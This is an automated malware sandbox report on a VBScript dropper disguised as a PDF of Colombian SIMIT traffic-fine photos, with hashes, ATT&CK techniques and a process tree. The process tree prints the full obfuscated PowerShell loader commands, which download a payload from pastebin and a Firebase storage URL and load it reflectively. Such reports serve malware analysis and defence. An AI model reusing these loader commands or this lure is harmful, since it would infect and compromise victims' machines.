f2210b872fa03ec869ad401139fb07405005043d9adeae4ae9bcc0a837b9b249

General

Target

IMAGENES FOTO COMPARENDOS SIMIT INFRACCIONES DETALLES #2024-666663265889-999658959-PDF.vbs
Size

207KB
MD5

6fb4803325e9551ee65380e39a58b250
SHA1

8fd05fec3c193676864b0eec7a4d5ba1a118b4ea
SHA256

f2210b872fa03ec869ad401139fb07405005043d9adeae4ae9bcc0a837b9b249
SHA512

23c4922fc122038050e1cb37fe728910d5d013bec36a3aecf7ff83148ade88e6df31f4e554a104e17e301dfd7690fe7abfebbba12522c95e422d9c7e3089f899
SSDEEP

384:2747Y7474747Y7474747Y7474747Y7474747Y7474747Y7474747Y7474747Y74Y:Clz/X

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pastebin.com/raw/0FK5ax2D

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2592	powershell.exe
2772	powershell.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2552	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2552	PING.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2772	powershell.exe
2592	powershell.exe
2728	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2728	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2432 wrote to memory of 2772	2432	WScript.exe	31
PID 2432 wrote to memory of 2772	2432	WScript.exe	31
PID 2432 wrote to memory of 2772	2432	WScript.exe	31
PID 2772 wrote to memory of 2592	2772	powershell.exe	33
PID 2772 wrote to memory of 2592	2772	powershell.exe	33
PID 2772 wrote to memory of 2592	2772	powershell.exe	33
PID 2592 wrote to memory of 2556	2592	powershell.exe	34
PID 2592 wrote to memory of 2556	2592	powershell.exe	34
PID 2592 wrote to memory of 2556	2592	powershell.exe	34
PID 2592 wrote to memory of 2552	2592	powershell.exe	35
PID 2592 wrote to memory of 2552	2592	powershell.exe	35
PID 2592 wrote to memory of 2552	2592	powershell.exe	35
PID 2592 wrote to memory of 2728	2592	powershell.exe	36
PID 2592 wrote to memory of 2728	2592	powershell.exe	36
PID 2592 wrote to memory of 2728	2592	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IMAGENES FOTO COMPARENDOS SIMIT INFRACCIONES DETALLES #2024-666663265889-999658959-PDF.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★EM★QwBS★Gg★bQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★M★BG★Es★NQBh★Hg★MgBE★Cc★I★★7★CQ★Zg★g★D0★I★★o★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★I★★7★Ek★bgB2★G8★awBl★C0★VwBl★GI★UgBl★HE★dQBl★HM★d★★g★C0★VQBS★Ek★I★★k★EM★QwBS★Gg★bQ★g★C0★TwB1★HQ★RgBp★Gw★ZQ★g★CQ★Zg★g★C0★VQBz★GU★QgBh★HM★aQBj★F★★YQBy★HM★aQBu★Gc★I★★7★GM★bQBk★C4★ZQB4★GU★I★★v★GM★I★★7★H★★aQBu★Gc★I★★x★DI★Nw★u★D★★Lg★w★C4★MQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★u★GU★e★Bl★C★★LQBj★G8★bQBt★GE★bgBk★C★★ew★k★GY★I★★9★C★★K★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★C★★Ow★k★FE★U★B0★GE★dg★g★D0★I★★o★C★★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★J★Bm★C★★KQ★g★Ds★SQBu★HY★bwBr★GU★LQBX★GU★YgBS★GU★cQB1★GU★cwB0★C★★LQBV★FI★SQ★g★CQ★UQBQ★HQ★YQB2★C★★LQBP★HU★d★BG★Gk★b★Bl★C★★J★Bm★C★★LQBV★HM★ZQBC★GE★cwBp★GM★U★Bh★HI★cwBp★G4★ZwB9★C★★Ow★k★FE★U★B0★GE★dg★g★D0★I★★o★C★★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★J★Bm★C★★KQ★g★Ds★J★Bm★Gg★b★Bv★Hc★I★★9★C★★Jw★w★Cc★I★★7★CQ★a★B1★HY★YwBq★C★★PQ★g★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★C★★OwBb★EI★eQB0★GU★WwBd★F0★I★★k★Gs★awBr★HU★eQ★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★FE★U★B0★GE★dg★u★HI★ZQBw★Gw★YQBj★GU★K★★n★CQ★J★★n★Cw★JwBB★Cc★KQ★g★Ck★I★★7★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★OgBD★HU★cgBy★GU★bgB0★EQ★bwBt★GE★aQBu★C4★T★Bv★GE★Z★★o★CQ★awBr★Gs★dQB5★Ck★LgBH★GU★d★BU★Hk★c★Bl★Cg★JwBU★GU★a★B1★Gw★YwBo★GU★cwBY★Hg★W★B4★Hg★LgBD★Gw★YQBz★HM★MQ★n★Ck★LgBH★GU★d★BN★GU★d★Bo★G8★Z★★o★Cc★TQBz★HE★QgBJ★GI★WQ★n★Ck★LgBJ★G4★dgBv★Gs★ZQ★o★CQ★bgB1★Gw★b★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★Jw★w★DM★OQ★1★D★★N★★4★Dc★YQ★w★DQ★Zg★t★GU★YgBk★GE★LQBh★D★★ZQ★0★C0★Yw★0★DM★OQ★t★Dc★ZQBm★DY★Nw★x★GM★ZQ★9★G4★ZQBr★G8★d★★m★GE★aQBk★GU★bQ★9★HQ★b★Bh★D8★d★B4★HQ★LgBE★EM★R★BD★EQ★QwBE★EM★R★BD★EQ★Rg★y★CU★UwBB★FQ★T★BV★E0★M★★y★CU★UwBF★FQ★UgBP★F★★UwBO★EE★UgBU★FM★TgBJ★E0★M★★y★CU★V★BJ★E0★SQBT★C8★bw★v★G0★bwBj★C4★d★Bv★H★★cwBw★H★★YQ★u★GE★O★★x★DM★MQ★t★GE★YQBz★G8★bwBv★HI★cgBy★HI★LwBi★C8★M★B2★C8★bQBv★GM★LgBz★Gk★c★Bh★GU★b★Bn★G8★bwBn★C4★ZQBn★GE★cgBv★HQ★cwBl★HM★YQBi★GU★cgBp★GY★Lw★v★Do★cwBw★HQ★d★Bo★Cc★I★★s★C★★J★Bo★HU★dgBj★Go★I★★s★C★★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cw★I★★k★GY★a★Bs★G8★dw★s★C★★Jw★x★Cc★L★★g★Cc★UgBv★GQ★YQ★n★C★★KQ★p★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\IMAGENES FOTO COMPARENDOS SIMIT INFRACCIONES DETALLES #2024-666663265889-999658959-PDF.vbs');powershell $Yolopolhggobek;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/0FK5ax2D' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$fhlow = '0' ;$huvcj = 'C:\Users\Admin\AppData\Local\Temp\IMAGENES FOTO COMPARENDOS SIMIT INFRACCIONES DETALLES #2024-666663265889-999658959-PDF.vbs' ;[Byte[]] $kkkuy = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($kkkuy).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('03950487a04f-ebda-a0e4-c439-7ef671ce=nekot&aidem=tla?txt.DCDCDCDCDCDF2%SATLUM02%SETROPSNARTSNIM02%TIMIS/o/moc.topsppa.a8131-aasooorrrr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huvcj , '____________________________________________-------', $fhlow, '1', 'Roda' ));"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2592
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c
      4⤵
      PID:2556
  - - C:\Windows\system32\PING.EXE
      "C:\Windows\system32\PING.EXE" 127.0.0.1
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ebf81abfb224a8b77f21394be1ecc82c

SHA1
17cd7aba6d5772887b633d736c5f87439189a005

SHA256
16890c2ecd3adf2fa19202d172da10f3b7306d8adc9a768b4519dead71bb1681

SHA512
639d1914cd555ccfd2e36112d050de9340a18e7f0e98abe81022d6382b60ce3e3c41f0b3991bfeac8cfc27446e4a3b2b9c24e79072599289754a2021ce211cf9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KJZ0TUUF11C6ET4MYFUG.temp

Filesize
7KB

MD5
c20a82bed1131fb05765873e76afcfbf

SHA1
19a0ae22c8518ca4a37982906e625a8bb8715998

SHA256
de57c3c973b739362a065cbf9c17d01697a75a2836a24d9ec9741ab845504c9c

SHA512
93bd58f746678bedad8b8ff206f51103e239d8728526058f3031c5eff460622403d24e0d2c17d291a5d58b13733b7ca54fe9635c3f5e81252ef5554c5e600369

Download Submit
memory/2772-4-0x000007FEF577E000-0x000007FEF577F000-memory.dmp

Filesize
4KB

Download
memory/2772-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2772-6-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download
memory/2772-7-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

Filesize
9.6MB

Download
memory/2772-8-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

Filesize
9.6MB

Download
memory/2772-9-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

Filesize
9.6MB

Download
memory/2772-10-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

Filesize
9.6MB

Download
memory/2772-11-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

Filesize
9.6MB

Download
memory/2772-22-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

Filesize
9.6MB

Download

Resubmissions

Analysis

Sharing